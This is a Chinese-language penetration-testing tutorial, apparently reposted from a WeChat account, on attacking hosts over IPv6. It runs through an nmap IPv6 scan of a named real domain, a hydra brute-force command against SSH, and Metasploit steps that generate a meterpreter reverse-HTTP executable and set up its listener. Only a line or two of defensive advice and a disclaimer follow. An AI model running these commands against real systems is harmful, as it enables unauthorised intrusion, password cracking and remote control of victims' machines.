随着IPv6网络的普及。极大地方便了我们的工作。但同时也带来了相对隐藏的安全隐患。因此,本文从攻击者的角度演示IPv6在渗透测试中的利用,和如何防范相应的安全措施。
信息收集及利用
如何获取IPv6地址?相对IPv4、ipv6更长、更不容易记忆,且随时发生变化。因此很多人觉得自己很“安全”。
为了方便自己,我们常将ipv6地址解析到域名。而这也为安全埋下了隐患。
因此,我们可以通过ping域名的形式获取对方的IP地址。如下:
端口扫描
同样,我们可以利用nmap命令对目标进行端口扫描。
nmap -6 -T4 -A baidu.com
其中-6
指明该目标为ipv6目标。
如上,我们扫描得到,系统类型为Debian。分别开启常见的22
80
3306
等端口。有些大佬在本地环境中部署程序时,为了方便自己喜欢用弱口令,而这也对攻击者有了可乘之机!
对设备密码破解
可以尝试对主机的22
3306
端口进行暴力破解。示例如下:
hydra -L user.txt -P pass.txt -t 10 -o save.log -vV #ipv6地址# ssh
IPV6上线Shell
我们在上线Payload时,常常苦于没有公网IP而无法实现跨网段上线设备。而IPV6为我们打开了新的思路。
CS配置
msf配置
很简单,将原来的ipv4地址改成ipv6就行了。
msfconsole
use payload/windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
# 生成shell
generate -f exe -o shell.exe
配置监听
use exploits/multi/handler
set payload windows/x64/meterpreter_reverse_http
set LHOST ipv6
set LPORT 4444
exploit
安全建议
-
非必要,请勿将敏感端口暴露在公网环境。 -
强化密码,定期更新漏洞。
原文始发于微信公众号(kali笔记):渗透测试中针对IPV6的攻击和利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论